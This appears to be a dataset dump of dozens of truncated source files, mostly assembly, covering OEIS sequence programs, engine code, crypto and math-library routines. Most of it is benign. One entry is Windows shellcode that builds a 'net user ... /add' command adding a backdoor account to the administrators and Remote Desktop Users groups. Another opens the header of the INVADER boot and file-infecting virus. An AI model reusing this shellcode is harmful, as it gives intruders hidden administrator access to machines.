text stringlengths 1 1.05M |
|---|
; A109232: a(n) = floor(n*(e^2+1)/(e-1)^2).
; 2,5,8,11,14,17,19,22,25,28,31,34,36,39,42,45,48,51,53,56,59,62,65,68,71,73,76,79,82,85,88,90,93,96,99,102,105,107,110,113,116,119,122,125,127,130,133,136,139,142,144,147,150,153,156,159,161
mov $3,$0
mul $0,2
add $0,5
add $0,$3
sub $0,1
mov $1,$0
lpb $0,1
sub $0,14
sub... |
; A082639: Numbers n such that 2*n*(n+2) is a square.
; 0,2,16,98,576,3362,19600,114242,665856,3880898,22619536,131836322,768398400,4478554082,26102926096,152139002498,886731088896,5168247530882,30122754096400,175568277047522,1023286908188736
mul $0,2
lpb $0,1
mov $2,$0
sub $0,$0
add $0,$2
sub $0,1
add $1,$4... |
// Copyright (C) 2022 Jérôme "Lynix" Leclercq (lynix680@gmail.com)
// This file is part of the "Nazara Engine - Renderer module"
// For conditions of distribution and use, see copyright notice in Config.hpp
#pragma once
#ifndef NAZARA_RENDERER_RENDERERIMPL_HPP
#define NAZARA_RENDERER_RENDERERIMPL_HPP
#include <Nazar... |
// Copyright 2019-2020 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
#include "StructuredSphericalVolume.h"
#include "../common/export_util.h"
namespace openvkl {
namespace ispc_driver {
template <int W>
void StructuredSphericalVolume<W>::commit()
{
StructuredVolume<W>::commit();
... |
; ******************************************************************************
; ******************************************************************************
;
; Name : main.asm
; Purpose : Compiler Main Program
; Author : Paul Robson (paul@robsons.org.uk)
; Created : 14th October 2019
;
; ****************... |
; mem.asm:
;
; masm -Mx -Zi -DSEGNAME=????? asm.asm
;
TITLE MEM.ASM
;****************************************************************
;* MEM.ASM - Assembly mem-copy routines *
;* for 80286 and 80386 *
;****************************************************************
;
?PLM=1 ; PASCAL Calling c... |
;------------- loader和kernel ----------
LOADER_BASE_ADDR equ 0x900
LOADER_STACK_TOP equ LOADER_BASE_ADDR
LOADER_START_SECTOR equ 0x2
KERNEL_BIN_BASE_ADDR equ 0x70000 ;内核读取的存放的内存地址
KERNEL_START_SECTOR equ 0x9 ;内核在磁盘上的起始扇区
;KERNEL_ENTRY_POINT equ 0xc0001500 ;程序入口地址 不需要,直接在程序头读取入口地址
;------------- 页表... |
; A132921: Triangle read by rows: T(n,k) = n + Fibonacci(k) - 1, 1 <= k <= n.
; Submitted by Jamie Morken(s1)
; 1,2,2,3,3,4,4,4,5,6,5,5,6,7,9,6,6,7,8,10,13,7,7,8,9,11,14,19,8,8,9,10,12,15,20,28,9,9,10,11,13,16,21,29,42,10,10,11,12,14,17,22,30,43,64,11,11,12,13,15,18,23,31,44,65,99,12,12,13,14,16,19,24,32,45,66,100,155,... |
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r9
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WC_ht+0x6ca7, %rcx
nop
inc %r13
movw $0x6162, (%rcx)
nop
nop
and %rsi, %rsi
lea addresses_D_ht+0x16a07, %rbx
clflush (%rbx)
nop
nop
cmp %rdi, %rdi
mov (%rbx), %r12d
nop
nop
nop
nop
c... |
; A033419: [ 99/n ].
; 99,49,33,24,19,16,14,12,11,9,9,8,7,7,6,6,5,5,5,4,4,4,4,4,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
add $0,1
mov $1,99
div $1,$0
|
;---------------------------------------------------------------------
; virus INVADER ziskan 21. 8. 1991 z knihvny (Baran)
; Jedna se o kombinovany virus napadajici BOOT sektor a .COM a .EXE
; soubory. Inspiraci pro EXE cast viru je JERUSALEM B virus.
;-------------------------------------------... |
INF 0x15
LOD &(beep[2])[1]
LOD &(derp)[2]
LOD &(zurp)
zurp: .data 1 0xF
hurp: .data 2 0xAA
beep: .data 4 0xBADE
|
%ifdef flag
hellostring: db "hello", 0
%endif |
TradeMons:
; givemonster, getmonster, textstring, nickname (11 bytes), 14 bytes total
db NIDORINO, NIDORINA, 0,"TERRY@@@@@@"
db ABRA, MR_MIME, 0,"MARCEL@@@@@"
db BUTTERFREE,BEEDRILL, 2,"CHIKUCHIKU@"
db PONYTA, SEEL, 0,"SAILOR@@@@@"
db SPEAROW, FARFETCHD,2,"DUX@@@@@@@@"
db SLOWBRO, LICKITUNG,0,"M... |
Name: Driver-point-p.asm
Type: file
Size: 41755
Last-Modified: '1992-07-19T15:00:00Z'
SHA-1: 8DC38F717F496485A3A8DAB0D91A4AB9EEA7F4A0
Description: null
|
BITS 32
;TEST_FILE_META_BEGIN
;TEST_TYPE=TEST_F
;TEST_IGNOREFLAGS=
;TEST_FILE_META_END
; Cmp32RR1
mov eax, 0x4
mov ebx, 0x2
;TEST_BEGIN_RECORDING
cmp eax, ebx
;TEST_END_RECORDING
|
RSDPStr: dw 'RSD PTR '
RSDPerr1: dw 'Failed to find RSDP.'
findRSDP:
mov esi, RSPDStr
mov edi, 0x80000
mov ebx, 0x80400
mov edx, 0x16
call PMT.findStr
cmp edi, 0
jne .found
mov edi, 0xE0000
mov ebx, 0xFFFFF
call PMT.findStr
cmp edi, 0
jne .found
... |
[BITS 32]
global _start
section .text
_start:
xor edx, edx ; zero out edx
push edx ; push null byte onto stack
;cmd.exe net user test P@ssword123 /add & net localgroup administrators test /add & net localgroup "Remote desktop users" test /add
push 0x20202064
push 0x64612f20
push 0x74... |
lw a0, 0xf00(zero)
lw ra, 123(a1)
sw sp, -1(a1)
sw sp, 0(a5)
sw sp, 1(a5)
sw sp, 1(a5)
sw sp, 5(a5)
sw sp, 0x10(a5)
|
/*++
Copyright (c) Microsoft Corporation
Module Name:
FxCollection.cpp
Abstract:
This module implements a simple collection class to operate on
objects derived from FxObject.
Author:
Environment:
Both kernel and user mode
Revision History:
--*/
#include "FxSupportPch.hpp"
FxCollectionInter... |
// Copyright (c) 2009-2010 Satoshi Nakamoto
// Copyright (c) 2009-2014 The Bitcoin developers
// Copyright (c) 2014-2015 The Dash developers
// Copyright (c) 2015-2019 The PIVX developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-licens... |
/*
*Copyright (c) 2013-2014, yinqiwen <yinqiwen@gmail.com>
*All rights reserved.
*
*Redistribution and use in source and binary forms, with or without
*modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* ... |
dnl PowerPC-64 mpn_rshift -- rp[] = up[] >> cnt
dnl Copyright 2003, 2005 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of the GNU Lesser General Public License as published
dnl by... |
; A142406: Primes congruent to 25 mod 48.
; Submitted by Jon Maiga
; 73,313,409,457,601,937,1033,1129,1321,1609,1657,1753,1801,1993,2089,2137,2281,2377,2473,2521,2617,2713,2857,2953,3001,3049,3433,3529,3673,3769,4057,4153,4201,4297,4441,4729,4969,5113,5209,5449,5641,5689,5737,5881,6073,6121,6217,6361,6553,6793,6841,712... |
dc.w word_18E30-Map_DashDust
dc.w word_18E32-Map_DashDust
dc.w word_18E3A-Map_DashDust
dc.w word_18E42-Map_DashDust
dc.w word_18E4A-Map_DashDust
dc.w word_18E52-Map_DashDust
dc.w word_18E5A-Map_DashDust
dc.w word_18E62-Map_DashDust
dc.w word_18E6A-Map_DashDust
dc.w word_18E72-Map_DashDust
dc.w wor... |
// Copyright (C) 2018-2021 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
//
#include <vector>
#include <ngraph/opsets/opset3.hpp>
#include "single_layer_tests/scatter_ND_update.hpp"
#include "common_test_utils/test_constants.hpp"
using namespace LayerTestsDefinitions;
using namespace ngraph::opset3;
name... |
; A290168: If n is even then a(n) = n^2*(n+2)/8, otherwise a(n) = (n-1)*n*(n+1)/8.
; 0,0,2,3,12,15,36,42,80,90,150,165,252,273,392,420,576,612,810,855,1100,1155,1452,1518,1872,1950,2366,2457,2940,3045,3600,3720,4352,4488,5202,5355,6156,6327,7220,7410,8400
mov $1,$0
div $0,-2
bin $0,2
mul $1,$0
|
copyright zengfr site:http://github.com/zengfr/romhack
00042A move.l D1, (A0)+
00042C dbra D0, $42a
016B6E move.w ($6c,A6), (A4)+ [123p+ 6E, base+6BE2, base+6BF2, base+6C02, base+6C12, base+6C22, base+6C32, base+6C42, base+6C52, base+6C62, base+6C72, base+6C82, base+6C92, base+6CA2, base+6CB2, base+6CC2, bas... |
<%
import collections
import pwnlib.abi
import pwnlib.constants
import pwnlib.shellcraft
import six
%>
<%docstring>ia32_io_pgetevents(vararg_0, vararg_1, vararg_2, vararg_3, vararg_4) -> str
Invokes the syscall ia32_io_pgetevents.
See 'man 2 ia32_io_pgetevents' for more information.
Arguments:
vararg(int): varar... |
; A017258: a(n) = (9*n + 8)^2.
; 64,289,676,1225,1936,2809,3844,5041,6400,7921,9604,11449,13456,15625,17956,20449,23104,25921,28900,32041,35344,38809,42436,46225,50176,54289,58564,63001,67600,72361,77284,82369,87616,93025,98596,104329,110224,116281,122500,128881,135424,142129,148996,156025,163216,170569,178084,185761,1... |
OPTION DOTNAME
.text$ SEGMENT ALIGN(256) 'CODE'
EXTERN OPENSSL_ia32cap_P:NEAR
PUBLIC poly1305_init
PUBLIC poly1305_blocks
PUBLIC poly1305_emit
ALIGN 32
poly1305_init PROC PUBLIC
mov QWORD PTR[8+rsp],rdi ;WIN64 prologue
mov QWORD PTR[16+rsp],rsi
mov rax,rsp
$L$SEH_begin_poly1305_init::
mov rdi,rcx
mov rsi,rd... |
// Copyright (c) 2012-2015 The Bitcoin Core developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include "key.h"
#include "base58.h"
#include "script/script.h"
#include "uint256.h"
#include "util.h"
#include "utilstrenco... |
org 0x0000
setps 0x0000 drop
2 0x0013 deo
setrs 0xff00 drop
setps 0x0000 drop
|
; A015247: a(n) = (2*n - 15)*n^2.
; 0,-13,-44,-81,-112,-125,-108,-49,64,243,500,847,1296,1859,2548,3375,4352,5491,6804,8303,10000,11907,14036,16399,19008,21875,25012,28431,32144,36163,40500,45167,50176,55539,61268,67375,73872,80771,88084,95823,104000,112627,121716,131279,141328,151875,162932,174511,186624,199283,212500... |
// Copyright (c) 2011-2014 The Bitcoin Core developers
// Distributed under the MIT/X11 software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include "data/tx_invalid.json.h"
#include "data/tx_valid.json.h"
#include "key.h"
#include "keystore.h"
#include "main.... |
; A172225: Number of ways to place 2 nonattacking wazirs on an n X n board.
; 0,2,24,96,260,570,1092,1904,3096,4770,7040,10032,13884,18746,24780,32160,41072,51714,64296,79040,96180,115962,138644,164496,193800,226850,263952,305424,351596,402810,459420,521792,590304,665346,747320,836640,933732,1039034,1152996,1276080,140... |
#include "utility.h"
#include "params.h"
#include <math.h>
// double deg2rad(double x) { return x * M_PI / 180; }
// double rad2deg(double x) { return x * 180 / M_PI; }
double mph_to_ms(double mph) { return mph / 2.24; } // m.s-1
double ms_to_mph(double ms) { return ms * 2.24; } // mph
// d coord for left lane
doub... |
; A189122: a(n) = Sum_{i=0..n} (i+1)^2*n^i.
; Submitted by Christian Krause
; 1,5,45,526,7585,130371,2602285,59142588,1507308129,42563286145,1318792866941,44477806954890,1621859437812289,63576780042697663,2665971232476845805,119073945060707737336,5643402849491554535745,282861639567395407985661,1494920044454289186111116... |
.text
getMin:
pushq %rbp
movq %rsp, %rbp
movq %rdi, -24(%rbp)
movl %esi, -28(%rbp)
movl $0, -4(%rbp)
movss .FL0(%rip), %xmm0
movss %xmm0, -84(%rbp)
movl $999999, -8(%rbp)
jmp .L2
.L3:
movl -4(%rbp), %eax
movl -8(%rbp), %eax
cmpl %eax, -8(%rbp)
jge .L4
movl -4(%rbp), %eax
cltq
leaq 0(,%rax,4), %r... |
#include "PowerUp.h"
PowerUp::PowerUp(iPoint pos, std::string name, std::string tag, Application* app) :GameObject(name, tag, app)
{
// Init renderObject
InitRenderObjectWithXml(name);
InitRenderObjectWithXml("collected", 1);
renderObjects[1].draw = false;
for (int i = 0; i < 17; i++)
{
idleAnim.PushBack({ i ... |
INCLUDE "scripts/daycarebaby.asm";
DayCareMScript:
jp EnableAutoTextBoxDrawing
DayCareMTextPointers:
dw DayCareMText1
dw DayCareMText2
DayCareMText1:
TX_ASM
call SaveScreenTilesToBuffer2
ld a, [wDayCareInUse]
bit 0,a
jp nz, .daycareInUse
ld hl, DayCareIntroText
call PrintText
call YesNoChoice
ld a, [wCur... |
//============================================================================
// Name : CommandPlugin.cpp
// Author : Battelle Memorial Institute - Ben Paselsky (paselsky@battelle.org)
// Version :
// Copyright : Copyright (c) 2017 Battelle Memorial Institute. All rights reserved.
// Description : Pl... |
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r14
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0x1a37d, %r14
nop
nop
and $2097, %r12
mov (%r14), %edx
nop
nop
nop
sub %r11, %r11
lea addresses_A_ht+0x1d46b, %rsi
lea addresses_D_ht+0xb995, %rdi
nop
nop
nop
nop
cmp %r11, %r11
mov $98... |
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r14
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0xf001, %rsi
lea addresses_UC_ht+0x5c01, %rdi
nop
nop
nop
inc %rax
mov $100, %rcx
rep movsb
nop
nop
nop
xor %rbx, %rbx
lea addresses_UC_ht+0x1d601, %r10
nop
nop
nop
nop
nop
dec %rbx... |
@ This file was created from a .asm file
@ using the ads2gas_apple.pl script.
.set WIDE_REFERENCE, 0
.set ARCHITECTURE, 5
.set DO1STROUNDING, 0
.include "vpx_config_common.S"
.set ARCH_ARM , 1
.set ARCH_X86 , 0
.set ARCH_X86_64 , 0
.set HAVE_NEON , 1
.set HAVE_NEON_ASM , 1
.set HAVE_MMX , 0
.set HAVE_SSE ,... |
; A088137: Generalized Gaussian Fibonacci integers.
; 0,1,2,1,-4,-11,-10,13,56,73,-22,-263,-460,-131,1118,2629,1904,-4079,-13870,-15503,10604,67717,103622,4093,-302680,-617639,-327238,1198441,3378596,3161869,-3812050,-17109707,-22783264,5762593,79874978,142462177,45299420,-336787691,-809473642,-608584211,1211252504,424... |
SECTION code_clib
PUBLIC selectfile
PUBLIC _selectfile
.selectfile
._selectfile
call 0xb8c3
ret c
ld hl, 0xffff
ret
|
/**
* @file policy_manager_impl.cpp
* @author Marcel Smit
*
* @brief x11 CORBA Policy framework
*
* @copyright Copyright (c) Remedy IT Expertise BV
*/
#include "tao/x11/objproxy.h"
#include "tao/x11/Policy_ManagerC.h"
#include "tao/x11/exception_macros.h"
namespace TAOX11_NAMESPACE
{
namespace CORBA
... |
; $Id: tstDisasm-1A.asm 69111 2017-10-17 14:26:02Z vboxsync $
;; @file
; VBox disassembler: Assembler test routines
;
;
; Copyright (C) 2006-2017 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtualbox.org. This file is free software;
; you can redist... |
#include "dest.h"
#include<QBrush>
#include<QPixmap>
Dest::Dest(const Point & p, int e) :objectStar("DESTINATION"), pos {p}, edge {e}
{
//verifier p
if(pos.getX() < 0) pos.setX(abs(pos.getX()));
if(pos.getY() < 0) pos.setY(abs(pos.getY()));
//verifier edge
if(edge == 0){
edge = 10;
}e... |
; A049641: a(n) = Sum_{i=0..n} ((-1)^i)*T(i,n-i), array T as in A049639.
; 0,0,2,0,3,0,5,0,7,0,11,0,13,0,19,0,23,0,29,0,33,0,43,0,47,0,59,0,65,0,73,0,81,0,97,0,103,0,121,0,129,0,141,0,151,0,173,0,181,0,201,0,213,0,231,0,243,0,271,0,279,0,309,0,325,0,345,0,361,0,385,0,397,0,433,0
lpb $0
mov $2,$0
div $0,2
sub $2,... |
////////////////////////////////////////////////////////////////////////////////
// The following FIT Protocol software provided may be used with FIT protocol
// devices only and remains the copyrighted property of Garmin Canada Inc.
// The software is being provided on an "as-is" basis and as an accommodation,
// ... |
; From https://www.pouet.net/prod.php?which=78044
mov al, 0x13
int 0x10
push 0x9FF6
pop es
mov dx,0x3c9
P:
out dx, al
out dx, al
out dx, al
cmp al, 63
jz F
inc ax
F:
loop P
pop ds
X:
mov cl, -9
L:
mov bl, cl
mov ax, 0xcccd
mul di
lea ax, [bx-80]
add al, dh
imu... |
;
; Spectravideo SVI specific routines
; by Stefano Bodrato
; MSX emulation layer
;
; LIDRMV
;
;
; $Id: svi_ldirmv.asm,v 1.3 2015/01/19 01:32:57 pauloscustodio Exp $
;
PUBLIC LIDRMV
INCLUDE "svi.def"
LIDRMV:
call $3747 ;SETRD
ex (sp),hl
ex (sp),hl
loop:
in a,(VDP_DATAIN)
ld (de),a
inc de
dec bc
l... |
/*
* Copyright (c) 2021 Huawei Device Co., Ltd.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law ... |
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1991 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: tlLargeCalc.asm
AUTHOR: John Wedgwood, Dec 26, 1991
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
Name Date D... |
#ifndef SYSTEM_FADE_HPP
#define SYSTEM_FADE_HPP
#include <core.hpp>
#include <output.hpp>
#include <opengl.hpp>
#include <render-manager.hpp>
#include "animate.hpp"
#include "animation.hpp"
extern "C"
{
#define static
#include <wlr/types/wlr_matrix.h>
#include <wlr/render/wlr_renderer.h>
#undef static
#include <wlr/... |
// Copyright [2021] <rin;>
#include <Arduino.h>
#include "WebServer.h"
#include "WiFi.h"
#include "HttpServer.h"
HttpServer::HttpServer(void) {
Serial.println("なんでこれ動かないの?2");
}
WebServer server(80);
HttpServer::AccessReport HttpServer::resDecode() {
String method = "UNKNOWN";
switch (server.method()) {
c... |
; A211850: Number of nonnegative integer arrays of length 2n+5 with new values 0 upwards introduced in order, no three adjacent elements all unequal, and containing the value n+1.
; 63,147,286,494,785,1173,1672,2296,3059,3975,5058,6322,7781,9449,11340,13468,15847,18491,21414,24630,28153,31997,36176,40704,45595,50863,56... |
/*
* Copyright (c) 2017 ARM Limited.
*
* SPDX-License-Identifier: MIT
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to
* deal in the Software without restriction, including without limitation the
* rights ... |
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Berkeley Softworks 1990 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: print drivers
FILE: citoh9Dialog.asm
AUTHOR: Dave Durran
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
Na... |
dnl AMD64 mpn_mullo_basecase.
dnl Contributed to the GNU project by Torbjorn Granlund.
dnl Copyright 2008, 2009, 2011, 2012 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of ei... |
//===========================================================================
// Copyright (c) Microsoft Corporation 1996
//
// File: AllocSpy.cpp
//
// Description: This module contains the implementation of the exported
// functions:
//
... |
; A334987: Sum of centered triangular numbers dividing n.
; Submitted by Jamie Morken(s4)
; 1,1,1,5,1,1,1,5,1,11,1,5,1,1,1,5,1,1,20,15,1,1,1,5,1,1,1,5,1,11,32,5,1,1,1,5,1,20,1,15,1,1,1,5,1,47,1,5,1,11,1,5,1,1,1,5,20,1,1,15,1,32,1,69,1,1,1,5,1,11,1,5,1,1,1,24,1,1,1,15,1,1,1,5,86,1,1,5,1,11
add $0,1
mov $1,1
mov $2,$0
m... |
hello: file format elf64-littleriscv
Disassembly of section .text:
00000000000100b0 <register_fini>:
100b0: 00000793 li a5,0
100b4: c791 beqz a5,100c0 <register_fini+0x10>
100b6: 6549 lui a0,0x12
100b8: 48250513 addi a0,a0,1154 # 12482 <__libc_fini... |
; A081007: a(n) = Fibonacci(4n+1) - 1, or Fibonacci(2n)*Lucas(2n+1).
; 0,4,33,232,1596,10945,75024,514228,3524577,24157816,165580140,1134903169,7778742048,53316291172,365435296161,2504730781960,17167680177564,117669030460993,806515533049392,5527939700884756,37889062373143905,259695496911122584,1779979416004714188,12200... |
/*
* Copyright (c) 2018, Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publis... |
extern m7_ippsSMS4EncryptCFB:function
extern n8_ippsSMS4EncryptCFB:function
extern y8_ippsSMS4EncryptCFB:function
extern e9_ippsSMS4EncryptCFB:function
extern l9_ippsSMS4EncryptCFB:function
extern n0_ippsSMS4EncryptCFB:function
extern k0_ippsSMS4EncryptCFB:function
extern ippcpJumpIndexForMergedLibs
extern ippcpSafeIni... |
###############################################################################
# Copyright 2019 Intel Corporation
# All Rights Reserved.
#
# If this software was obtained under the Intel Simplified Software License,
# the following terms apply:
#
# The source code, information and material ("Material") containe... |
OUTPUT "op_C0_FF.bin"
;; solid formatting, just to get C0..FF sequence (interleaved by $41..$43 where needed)
ret nz
pop bc
jp nz,$4241
jp $4241
call nz,$4241
push bc
add a,$43
rst 00h
ret z
ret
jp z,$4241
call z,$4241
... |
/*
* ----------------- BEGIN LICENSE BLOCK ---------------------------------
*
* Copyright (c) 2018-2019 Intel Corporation
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code mu... |
#include <MEL/Mechatronics/VelocitySensor.hpp>
#include <iostream>
#include <string>
namespace mel {
//==============================================================================
// CLASS DEFINITIONS
//==============================================================================
VelocitySensor::VelocitySensor() ... |
; adapted from Eckhard Stolberg's bigmove.asm
; https://www.biglist.com/lists/stella/archives/199803/msg00201.html
; http://www.qotile.net/minidig/tricks.html
processor 6502
include vcs.h
; TIA (Stella) write-only registers
;
Vsync equ $00
Vblank equ $01
Wsync equ $02
Rsync equ $03
Nusiz0 equ $0... |
//////////////////////////////////////////////////////////////////////////
//
// This file is part of Iron's source files.
// Iron is free software, licensed under the MIT/X11 License.
// A copy of the license is provided with the library in the LICENSE file.
// Copyright (c) 2016, 2017, Igor Dimitrijevic
//
/////////... |
//MIT License
//
//Copyright(c) 2021 HaiLiang Feng
//
//QQ : 632865163
//Blog : https ://www.cnblogs.com/LynnVon/
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this softwareand associated documentation files(the "Software"), to deal
// in the Software without restrict... |
; A136767: n! never ends in this many 0's in base 4.
; 6,10,14,18,22,29,30,34,38,45,46,53,57,61,62,66,70,77,78,85,89,93,94,101,105,109,113,117,124,125,126,130,134,141,142,149,153,157,158,165,169,173,177,181,188,189,190,197,201,205,209,213,220,221,225,229,236
mov $2,$0
mul $0,2
add $0,1
cal $0,80468 ; a(n) = A080578(n)... |
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1992 -- All Rights Reserved
PROJECT: Lights Out
MODULE: Encryption
FILE: saverCrypt.asm
AUTHOR: Adam de Boor, Dec 8, 1992
ROUTINES:
Name Description
---- -----------
INT SaverCryptCalcul... |
/*
* Copyright (c) 2007, Michael Feathers, James Grenning and Bas Vodde
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above cop... |
#include "cpu/decoder/encoder_decoder.h"
#include <vector>
#include <yaml-cpp/yaml.h>
#include "common/scorer.h"
namespace amunmt {
namespace CPU {
////////////////////////////////////////////////
CPUEncoderDecoderBase::CPUEncoderDecoderBase(
const God &god,
const std::string& name,
const YAML::Node& con... |
#include <iostream>
#include <cstring>
#include <stdio.h>
using namespace std;
int WallPatterns(int n) {
if(n <= 2) {
return n;
}
return WallPatterns(n -1)+ WallPatterns(n -2);
}
int main() {
int n;
while(cin >> n) {
if(n == 0) break;
cout << WallPatterns(n)... |
;@xkas
incsrc hardware_registers.asm
incsrc bank00.asm
incsrc bank01.asm
incsrc bank02.asm
incsrc bank03.asm
incsrc bank04.asm
incsrc bank05.asm
incsrc bank06.asm
incsrc bank07.asm |
.data
myCharacter: .byte 'm'
.text
li $v0, 4 #uses code 4
la $a0, myCharacter
syscall |
; Copyright Oliver Kowalke 2009.
; Distributed under the Boost Software License, Version 1.0.
; (See accompanying file LICENSE_1_0.txt or copy at
; http://www.boost.org/LICENSE_1_0.txt)
; ---------------------------------------------------------------------------------
; | 0 | ... |
; A267776: Triangle read by rows giving successive states of cellular automaton generated by "Rule 209" initiated with a single ON (black) cell.
; 1,0,0,1,1,1,0,0,1,1,1,1,1,0,0,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1... |
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1989 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: textReplace.asm
AUTHOR: John Wedgwood, Oct 6, 1989
ROUTINES:
Name Description
---- -----------
TextReplace Do a replacement operat... |
; A154708: Numbers a such that b and c exist with b <= a < c and a*(a+1) + b^2 = c^2.
; 3,4,7,8,11,12,15,16,19,20,23,24,27,28,31,32,35,36,39,40,43,44,47,48,51,52,55,56,59,60,63,64,67,68,71,72,75,76,79,80,83,84,87,88,91,92,95,96,99,100,103,104,107,108,111,112,115,116,119,120,123,124,127,128,131,132,135,136,139,140
mov ... |
;;
;; Copyright (c) 2020-2021, Intel Corporation
;;
;; Redistribution and use in source and binary forms, with or without
;; modification, are permitted provided that the following conditions are met:
;;
;; * Redistributions of source code must retain the above copyright notice,
;; this list of conditions and... |
/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2014 Torus Knot Software Ltd
Permission is hereby granted, free of charge, to any person ... |
;------------------------------------------------------------------------------
; @file
; First code exectuted by processor after resetting.
;
; Copyright (c) 2008 - 2011, Intel Corporation. All rights reserved.<BR>
; SPDX-License-Identifier: BSD-2-Clause-Patent
;
;-----------------------------------------------... |
include 'format/format.inc'
format ELF64
section '.text' executable
public func
func:
; float* a - RDI
; float* b - RSI
; float* x - RDX
; size_t size - RCX
; index i - RAX
push rbx
xor rax, rax ; i = 0
dec rcx ; n = size - 1
jmp loop_condition
loop_condition:
... |
;;
;
; Name: stager_sock_bind
; Qualities: Can Have Nulls
; Version: $Revision: 1607 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; With enhancements from the unix... |
#include "CNShardServer.hpp"
#include "CNStructs.hpp"
#include "NanoManager.hpp"
#include "PlayerManager.hpp"
#include "NPCManager.hpp"
#include "MobManager.hpp"
#include "MissionManager.hpp"
#include "GroupManager.hpp"
namespace NanoManager {
// active powers
std::set<int> StunPowers = {1, 13, 42, 59, 78, 103};
std:... |
GLOBAL timerHandler
GLOBAL keyboardHandler
GLOBAL syscallHandlerA
GLOBAL picMasterMask
GLOBAL picSlaveMask
GLOBAL _sti
GLOBAL _cli
GLOBAL _EOI
GLOBAL _iretq
extern write_key
extern keyboarddddd
extern syscallHandler
extern schedulerToKernel
extern schedulerToUser
extern processNext
extern getQuantum
extern decQuantum... |
; $Id: ASMBitFirstSetU64.asm 69219 2017-10-24 15:01:30Z vboxsync $
;; @file
; IPRT - ASMBitFirstSetU64().
;
;
; Copyright (C) 2006-2017 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtualbox.org. This file is free software;
; you can redistribute it ... |
// Copyright 2018 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in ... |
//=================================================================================================
/*!
// \file src/mathtest/dmatdmatsub/MDbSDa.cpp
// \brief Source file for the MDbSDa dense matrix/dense matrix subtraction math test
//
// Copyright (C) 2012-2017 Klaus Iglberger - All Rights Reserved
//
// This fil... |
/*
* This file is part of the CitizenFX project - http://citizen.re/
*
* See LICENSE and MENTIONS in the root of the source tree for information
* regarding licensing.
*/
#include "StdInc.h"
#include <ScriptEngine.h>
#include "Hooking.h"
#include <optick.h>
#include <scrEngine.h>
#include <Nat... |
#ruledef test
{
ld {x: s8} => 0x55 @ x
}
ld 128 ; error: failed / error: out of range |
.386
.model flat,C
PUBLIC inport
PUBLIC inportb
PUBLIC inpw
PUBLIC inp
; This one runs circles around Borland's implementation
; If speed really is a concern, alter the declarations in <dos.h> to fastcall.
; This code must be changed too, then.
.code
inport proc near
inpw:
mov edx,[esp+4]
sub eax,eax
in ax,... |
;*************************************************************************
;
; This is BUFFALO 3.4 that has been modified to work with the CPU_1A1
; and CPU_1B HC11 boards from PMB Electronics.
;
; Modified: September 2002
; By: Paul M Bealing
